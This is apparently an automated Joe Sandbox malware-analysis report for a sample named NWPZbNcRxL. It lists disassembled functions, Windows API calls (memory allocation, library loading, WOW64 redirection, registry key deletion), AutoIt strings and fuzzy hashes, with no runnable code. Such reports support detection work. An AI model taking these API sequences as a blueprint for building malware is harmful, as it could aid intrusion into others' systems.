                                                                                                                            • Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                                                                                            • String ID: @
                                                                                                                            • API String ID: 4150878124-2766056989
                                                                                                                            • Opcode ID: f480e82bc6954823b7b07e8be5d329fe1d9f3ef732a2280333023f2c4d861195
                                                                                                                            • Instruction ID: 98a1b05839c5279d54fae54f8e0d9227ca75567deb427b45b36d54e61284b90d
                                                                                                                            • Opcode Fuzzy Hash: f480e82bc6954823b7b07e8be5d329fe1d9f3ef732a2280333023f2c4d861195
                                                                                                                            • Instruction Fuzzy Hash: 5141417690021CBFDB20DFA4CC85ADEBBB8EB09300F044199FA59B7191DA716F45DBA0
                                                                                                                            APIs
                                                                                                                            • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,00C9F910,00000000,?,?,?,?), ref: 00C979DF
                                                                                                                            • GetWindowLongW.USER32 ref: 00C979FC
                                                                                                                            • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00C97A0C
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Window$Long
                                                                                                                            • String ID: SysTreeView32
                                                                                                                            • API String ID: 847901565-1698111956
                                                                                                                            • Opcode ID: e45bc14e3c15bac06e8ee2e424c01d6aecadb1cdae8bc5d962741774dcbd17b9
                                                                                                                            • Instruction ID: 414b794853ee27b4bc0b0b1a53fe00d7191ebdcf8441ccd9fabb3e138a07d034
                                                                                                                            • Opcode Fuzzy Hash: e45bc14e3c15bac06e8ee2e424c01d6aecadb1cdae8bc5d962741774dcbd17b9
                                                                                                                            • Instruction Fuzzy Hash: 6831B031215206ABDF118F38DC49BEA77A9EB05324F254725F875D22E0D731EE61AB50
                                                                                                                            APIs
                                                                                                                            • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 00C97461
                                                                                                                            • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00C97475
                                                                                                                            • SendMessageW.USER32(?,00001002,00000000,?), ref: 00C97499
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: MessageSend$Window
                                                                                                                            • String ID: SysMonthCal32
                                                                                                                            • API String ID: 2326795674-1439706946
                                                                                                                            • Opcode ID: 203fbcdc47d809fff6e4c19dc571f1c03ed73c033ec11d0950d4ff9def3f6592
                                                                                                                            • Instruction ID: 3975e4cac6b2b3d4b457d30aeab1b2672d456d6e70fc94fe1c9cf29136667950
                                                                                                                            • Opcode Fuzzy Hash: 203fbcdc47d809fff6e4c19dc571f1c03ed73c033ec11d0950d4ff9def3f6592
                                                                                                                            • Instruction Fuzzy Hash: 60219132510218BBDF118F54DC4AFEE3B69EB48724F110214FE156B1D1DA75AC51DBA0
                                                                                                                            APIs
                                                                                                                            • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 00C97C4A
                                                                                                                            • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 00C97C58
                                                                                                                            • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00C97C5F
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: MessageSend$DestroyWindow
                                                                                                                            • String ID: msctls_updown32
                                                                                                                            • API String ID: 4014797782-2298589950
                                                                                                                            • Opcode ID: 4832bf7bc8434ecbdc591665546d68f1a35da41646bf36cd75bd37ad586dce98
                                                                                                                            • Instruction ID: 10c1d45c7efca7da64d5ec62b41c28a03edb027abb231a24cb8848786fac74f8
                                                                                                                            • Opcode Fuzzy Hash: 4832bf7bc8434ecbdc591665546d68f1a35da41646bf36cd75bd37ad586dce98
                                                                                                                            • Instruction Fuzzy Hash: B0218CB5615209AFDB10DF28DCC5EAB37ECEF4A354B140159FA119B3A1CB31EC51AAA0
                                                                                                                            APIs
                                                                                                                            • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00C96D3B
                                                                                                                            • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00C96D4B
                                                                                                                            • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00C96D70
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: MessageSend$MoveWindow
                                                                                                                            • String ID: Listbox
                                                                                                                            • API String ID: 3315199576-2633736733
                                                                                                                            • Opcode ID: ad5808ca38056986609b186189c78edd72f95baa95ead05602f8d9649be99f6c
                                                                                                                            • Instruction ID: 318a15d2de13aae33c58c99566ebf329a12fe65dc98d2c41645946b7f27b5578
                                                                                                                            • Opcode Fuzzy Hash: ad5808ca38056986609b186189c78edd72f95baa95ead05602f8d9649be99f6c
                                                                                                                            • Instruction Fuzzy Hash: 4B219232610118BFDF118F54DC49FBB3BBAEF89750F118129F9659B1E0C6719C5197A0
                                                                                                                            APIs
                                                                                                                            • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00C97772
                                                                                                                            • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00C97787
                                                                                                                            • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00C97794
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: MessageSend
                                                                                                                            • String ID: msctls_trackbar32
                                                                                                                            • API String ID: 3850602802-1010561917
                                                                                                                            • Opcode ID: 0d60aa055bfd05fb5366f05bdcdb914d39535e85ebbd1f54c4dad1c8cae214f9
                                                                                                                            • Instruction ID: d1ccb05bb15a4cc4df1cfa5507ef82e1d07025ab05b9f0949e4b4b57a52b55c3
                                                                                                                            • Opcode Fuzzy Hash: 0d60aa055bfd05fb5366f05bdcdb914d39535e85ebbd1f54c4dad1c8cae214f9
                                                                                                                            • Instruction Fuzzy Hash: 06113A72210208BFEF255FA1CC09FEB3768EF88B54F11422CFA5192090C271E811DB10
                                                                                                                            APIs
                                                                                                                            • GetSystemDirectoryW.KERNEL32(?), ref: 00C51775
                                                                                                                              • Part of subcall function 00C8BFF0: LoadLibraryA.KERNEL32(kernel32.dll,?,00C5195E,?), ref: 00C8BFFE
                                                                                                                              • Part of subcall function 00C8BFF0: GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 00C8C010
                                                                                                                            • FreeLibrary.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000104), ref: 00C5196D
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Library$AddressDirectoryFreeLoadProcSystem
                                                                                                                            • String ID: (l$WIN_XPe
                                                                                                                            • API String ID: 582185067-2603807210
                                                                                                                            • Opcode ID: ec6d94e3d147dc5c44a0a74c70481995f6e38134524f2a77f61bdabaddd92ac7
                                                                                                                            • Instruction ID: ea50502af276b9c9604d3f074d60a8b4dade2adcf57bcde30e167674e4f3a1c8
                                                                                                                            • Opcode Fuzzy Hash: ec6d94e3d147dc5c44a0a74c70481995f6e38134524f2a77f61bdabaddd92ac7
                                                                                                                            • Instruction Fuzzy Hash: 3BF0A574801109EBDB15DB95C988BECBBB8AB08346F580096E912A21A1D7758F89DF64
                                                                                                                            APIs
                                                                                                                            • LoadLibraryA.KERNEL32(kernel32.dll,?,00C14BD0,?,00C14DEF,?,00CD52F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00C14C11
                                                                                                                            • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00C14C23
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: AddressLibraryLoadProc
                                                                                                                            • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                                                                                                            • API String ID: 2574300362-3689287502
                                                                                                                            • Opcode ID: 79791ea41701a6d81eb6df438fdb402481d66dd76a7aaafb609f18c997d24467
                                                                                                                            • Instruction ID: b2b47bb9605ee01de0b633b3d7281260b3154a55cee90a132316e62cf8e06b8b
                                                                                                                            • Opcode Fuzzy Hash: 79791ea41701a6d81eb6df438fdb402481d66dd76a7aaafb609f18c997d24467
                                                                                                                            • Instruction Fuzzy Hash: B4D01731611713CFDB20AFB1D91CB4ABAE5EF0A352B118C3ED496D6160E6B0D9C1CA90
                                                                                                                            APIs
                                                                                                                            • LoadLibraryA.KERNEL32(kernel32.dll,?,00C14B83,?), ref: 00C14C44
                                                                                                                            • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00C14C56
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: AddressLibraryLoadProc
                                                                                                                            • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                                                                                                            • API String ID: 2574300362-1355242751
                                                                                                                            • Opcode ID: b043039cd2c1c7a0705b4a40515517551f22e1aa62a2bc3c2258239560a007ec
                                                                                                                            • Instruction ID: f13eb50e1c1185ebd1ba98559b0b947af9b102e15c1abd0bee8cae8c7c73b749
                                                                                                                            • Opcode Fuzzy Hash: b043039cd2c1c7a0705b4a40515517551f22e1aa62a2bc3c2258239560a007ec
                                                                                                                            • Instruction Fuzzy Hash: 9BD01731610713CFDB249F31D92C74E7AE4AF06351B21883ED4A6DA560E770D9C0DA90
                                                                                                                            APIs
                                                                                                                            • LoadLibraryA.KERNEL32(advapi32.dll,?,00C91039), ref: 00C90DF5
                                                                                                                            • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00C90E07
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: AddressLibraryLoadProc
                                                                                                                            • String ID: RegDeleteKeyExW$advapi32.dll
                                                                                                                            • API String ID: 2574300362-4033151799
                                                                                                                            • Opcode ID: f35a110a06339770b0c1e79945a9d00f79271bd4ff4894df43a86dcce9163cd3
                                                                                                                            • Instruction ID: e14fab4d990f4fd9084955d4eec83c9691a6557bef98b11a5a5dd31cd8cf428f
                                                                                                                            • Opcode Fuzzy Hash: f35a110a06339770b0c1e79945a9d00f79271bd4ff4894df43a86dcce9163cd3
                                                                                                                            • Instruction Fuzzy Hash: DCD01771510722CFDB209F75D80CB8AB6E5AF05352F218C7ED4D6D2161EAB0D9D0CA90
                                                                                                                            APIs
                                                                                                                            • LoadLibraryA.KERNEL32(kernel32.dll,00000001,00C88CF4,?,00C9F910), ref: 00C890EE
                                                                                                                            • GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 00C89100
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: AddressLibraryLoadProc
                                                                                                                            • String ID: GetModuleHandleExW$kernel32.dll
                                                                                                                            • API String ID: 2574300362-199464113
                                                                                                                            • Opcode ID: db83a498d830440c52e67e96be4b0385bf7d76777556500cf80822d9bd732503
                                                                                                                            • Instruction ID: f93aea3750dd1d282e4adea9467ad80f52dd34d6f0f046bd7fca61916dfe4e4b
                                                                                                                            • Opcode Fuzzy Hash: db83a498d830440c52e67e96be4b0385bf7d76777556500cf80822d9bd732503
                                                                                                                            • Instruction Fuzzy Hash: 32D01735614723CFDB20AF71D81C71E76E4AF05355B16883ED496D65A0EB70C880CB90
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: LocalTime__swprintf
                                                                                                                            • String ID: %.3d$WIN_XPe
                                                                                                                            • API String ID: 2070861257-2409531811
                                                                                                                            • Opcode ID: fa366ab87c1b12cd8d77dcd149279d65daf1fe9b9e96169bef06a0a44d9ed0bb
                                                                                                                            • Instruction ID: e408951abc613d420101a176eb3b3f08ef424e3e9366d597fed05e3952c350e8
                                                                                                                            • Opcode Fuzzy Hash: fa366ab87c1b12cd8d77dcd149279d65daf1fe9b9e96169bef06a0a44d9ed0bb
                                                                                                                            • Instruction Fuzzy Hash: 25D01779844108FACB009B96988DFFD777CAB0D382F181462FC06E2040E2318BD9EA29
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 2c7456cffe0761f051c21db22a16a9f5473ee32f80362d4bf1cede0697c5f657
                                                                                                                            • Instruction ID: b943913267d2342bce800a7abe144941251e86c72d86d97ed5b506b6f6bf12aa
                                                                                                                            • Opcode Fuzzy Hash: 2c7456cffe0761f051c21db22a16a9f5473ee32f80362d4bf1cede0697c5f657
                                                                                                                            • Instruction Fuzzy Hash: 1BC16275A04215EFCB24CFA4C888EAEBBB5FF48718B154A98E815DB351D730DE81DB90
                                                                                                                            APIs
                                                                                                                            • CharLowerBuffW.USER32(?,?), ref: 00C8E0BE
                                                                                                                            • CharLowerBuffW.USER32(?,?), ref: 00C8E101
                                                                                                                              • Part of subcall function 00C8D7A5: CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 00C8D7C5
                                                                                                                            • VirtualAlloc.KERNEL32(00000000,00000077,00003000,00000040), ref: 00C8E301
                                                                                                                            • _memmove.LIBCMT ref: 00C8E314
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: BuffCharLower$AllocVirtual_memmove
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3659485706-0
                                                                                                                            • Opcode ID: 9dd6671b8fbeb881a6134ef0bea7c9b78c818e065bb13ca1feba2abeec1f4f89
                                                                                                                            • Instruction ID: 915f07d761c89f33fd0227bd7bb3642f090449480b81d46b71f5ba3357d4aa6c
                                                                                                                            • Opcode Fuzzy Hash: 9dd6671b8fbeb881a6134ef0bea7c9b78c818e065bb13ca1feba2abeec1f4f89
                                                                                                                            • Instruction Fuzzy Hash: 6FC14A71608301DFC714EF28C490A6ABBE4FF89718F14896DF8999B351D731EA46CB86
                                                                                                                            APIs
                                                                                                                            • CoInitialize.OLE32(00000000), ref: 00C880C3
                                                                                                                            • CoUninitialize.OLE32 ref: 00C880CE
                                                                                                                              • Part of subcall function 00C6D56C: CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 00C6D5D4
                                                                                                                            • VariantInit.OLEAUT32(?), ref: 00C880D9
                                                                                                                            • VariantClear.OLEAUT32(?), ref: 00C883AA
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 780911581-0
